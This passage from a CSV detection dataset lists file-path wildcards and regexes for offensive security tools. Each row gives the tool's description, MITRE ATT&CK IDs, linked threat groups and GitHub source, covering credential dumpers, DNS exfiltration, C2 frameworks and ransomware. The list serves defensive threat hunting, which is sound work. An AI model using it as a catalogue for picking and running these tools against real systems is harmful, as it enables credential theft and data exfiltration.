Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14972" "*\dllexploit.cpp*",".{0,1000}\\dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","14973" "*\dllexploit.exe*",".{0,1000}\\dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","14974" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - 
Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14975" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14976" "*\dll-hijack-by-proxying*",".{0,1000}\\dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","14977" "*\dll-hijack-by-proxying-master*",".{0,1000}\\dll\-hijack\-by\-proxying\-master.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","14978" "*\DLLHound.ps1*",".{0,1000}\\DLLHound\.ps1.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows 
computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","14979" "*\dllinject.py*",".{0,1000}\\dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","14980" "*\dllinjection_rs.exe*",".{0,1000}\\dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14981" "*\dll-installer.ps1*",".{0,1000}\\dll\-installer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","14982" "*\dllproxy.nim*",".{0,1000}\\dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","14983" "*\Dll-rewriting.cpp*",".{0,1000}\\Dll\-rewriting\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14984" "*\Dll-rewriting.dll*",".{0,1000}\\Dll\-rewriting\.dll.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14985" "*\DLLScan_$timestamp.csv*",".{0,1000}\\DLLScan_\$timestamp\.csv.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","14986" "*\dll-sideload\main.cpp*",".{0,1000}\\dll\-sideload\\main\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","14987" "*\DllVoidFunction.txt*",".{0,1000}\\DllVoidFunction\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","14988" "*\dns2tcp\*",".{0,1000}\\dns2tcp\\.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14990" "*\dns2tcp\server*",".{0,1000}\\dns2tcp\\server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14991" "*\dns2tcp-0.*",".{0,1000}\\dns2tcp\-0\..{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","14992" "*\dnscan.py*",".{0,1000}\\dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS 
subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","14993" "*\dns-cat.exe*",".{0,1000}\\dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","14994" "*\dnschef.exe*",".{0,1000}\\dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14995" "*\dnschef.ini*",".{0,1000}\\dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14996" "*\dnschef.log*",".{0,1000}\\dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14997" "*\dnschef.py*",".{0,1000}\\dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14998" "*\dnschef-ng\*",".{0,1000}\\dnschef\-ng\\.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","14999" "*\dnscrypt-proxy*",".{0,1000}\\dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","15000" "*\dns-dump.ps1*",".{0,1000}\\dns\-dump\.ps1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15001" "*\dnsdump.py*",".{0,1000}\\dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS 
records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","15002" "*\dnsExfiltrator.cs*",".{0,1000}\\dnsExfiltrator\.cs.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15003" "*\dnsExfiltrator.dll*",".{0,1000}\\dnsExfiltrator\.dll.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15004" "*\dnsexfiltrator.py*",".{0,1000}\\dnsexfiltrator\.py.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","15005" "*\dnskire.js*",".{0,1000}\\dnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","15006" "*\DnSpoof.ps1*",".{0,1000}\\DnSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15007" "*\dnsrecon.py*",".{0,1000}\\dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15008" "*\dnsrecon-subdomain-bruteforce.py*",".{0,1000}\\dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated 
enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15009" "*\dnsstager.py*",".{0,1000}\\dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","15010" "*\DNS-TXT-Pwnage.ps1*",".{0,1000}\\DNS\-TXT\-Pwnage\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15011" "*\dns-zone-transfer.py*",".{0,1000}\\dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15012" "*\DocsPLZ.cpp*",".{0,1000}\\DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","15014" 
"*\DocsPLZ.exe*",".{0,1000}\\DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","15015" "*\Documents\*.dedsec*",".{0,1000}\\Documents\\.{0,1000}\.dedsec.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","15016" "*\Documents\Crypttest\*",".{0,1000}\\Documents\\Crypttest\\.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15018" "*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15019" "*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15020" "*\Do-Exfiltration.ps1*",".{0,1000}\\Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15021" "*\DoHC2.cs*",".{0,1000}\\DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","15022" "*\domain_admins.txt*",".{0,1000}\\domain_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","15023" "*\DomainGPPPassword.cs*",".{0,1000}\\DomainGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","15024" "*\DomainPasswordSpray\*",".{0,1000}\\DomainPasswordSpray\\.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","15025" "*\DomainPasswordSpray-master*",".{0,1000}\\DomainPasswordSpray\-master.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","15026" "*\DomainRecon\*.txt",".{0,1000}\\DomainRecon\\.{0,1000}\.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","15027" "*\DomainTrustRecon.ahk*",".{0,1000}\\DomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15028" "*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","15029" "*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - 
T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15030" "*\domcachedump.py*",".{0,1000}\\domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - 